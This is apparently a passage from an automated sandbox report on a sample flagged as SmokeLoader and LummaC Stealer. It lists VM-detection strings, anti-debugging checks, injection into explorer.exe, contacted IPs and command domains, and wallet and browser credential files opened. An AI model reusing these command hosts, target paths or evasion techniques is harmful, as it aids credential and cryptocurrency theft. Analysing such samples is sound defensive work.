          Source: explorer.exe, 0000000B.00000003.2442993940.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
          Source: explorer.exe, 00000001.00000000.1710883230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2115636767.0000000001907000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220441395.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512292120.0000000008F07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512292120.0000000008F7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2498390569.0000000008F7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008F38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008F07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008F38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008F7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000B.00000003.2712657066.000000000900E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000001.00000000.1711503091.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000B.00000003.2505122702.0000000006C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
          Source: explorer.exe, 0000000B.00000002.2868395597.0000000006C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000AE97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000001.00000000.1710883230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000001.00000000.1710883230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 0000000B.00000002.2870375975.0000000008F7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000000480?
          Source: explorer.exe, 00000001.00000000.1711503091.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000001.00000000.1711503091.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000003.2447162030.0000000006BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2658-3693405117-2476756634@3
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000001.00000000.1710883230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 0000000B.00000003.2760390971.000000000900E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTroVMWare
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000AE97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00p
          Source: explorer.exe, 0000000B.00000003.2540293248.000000000AE97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:33
          Source: 8FDD.exe, 00000006.00000002.2220441395.00000000018BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000001.00000000.1710883230.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 0000000B.00000002.2863074259.0000000000433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000ADBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000f
          Source: explorer.exe, 0000000B.00000003.2541593222.000000000AEF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000001.00000000.1707289032.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
          Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSystem information queried: CodeIntegrityInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A0D90 mov eax, dword ptr fs:[00000030h]0_2_029A0D90
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A092B mov eax, dword ptr fs:[00000030h]0_2_029A092B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BA91BA push dword ptr fs:[00000030h]0_2_02BA91BA
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0288869A push dword ptr fs:[00000030h]5_2_0288869A
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0445092B mov eax, dword ptr fs:[00000030h]5_2_0445092B
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_04450D90 mov eax, dword ptr fs:[00000030h]5_2_04450D90

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\explorer.exeFile created: crwjtgt.1.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.159.133.233 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 11E19D0Jump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtThread created: unknown EIP: 34119D0Jump to behavior
          LummaC encrypted strings found
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: pedestriankodwu.xyz
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: towerxxuytwi.xyz
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: ellaboratepwsz.xyz
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: penetratedpoopp.xyz
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: swellfrrgwwos.xyz
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: contintnetksows.shop
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: foodypannyjsud.shop
          Source: 8FDD.exe, 00000006.00000002.2219375712.000000000088D000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: potterryisiw.shop
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
          Source: explorer.exe, 00000001.00000000.1709522857.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1707497016.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000001.00000000.1707497016.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000002.2863074259.0000000000410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanll/~
          Source: explorer.exe, 00000001.00000000.1707289032.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000001.00000000.1707497016.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000001.00000000.1707497016.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: explorer.exe, 0000000B.00000003.2763366667.0000000008FA1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2712657066.0000000008F9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2774420897.0000000008FAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008FB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2760390971.0000000008FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
          Source: 8FDD.exe, 00000006.00000003.2177571479.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.0000000001992000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220943576.0000000001992000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220441395.00000000018E9000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2177453100.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2177571479.0000000001992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8FDD.exe PID: 4628, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Yara detected SmokeLoader
          Source: Yara matchFile source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: },{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets",
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: 8FDD.exe, 00000006.00000003.2115559211.000000000191B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: 8FDD.exe, 00000006.00000003.2115559211.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger L
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum`
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum`
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
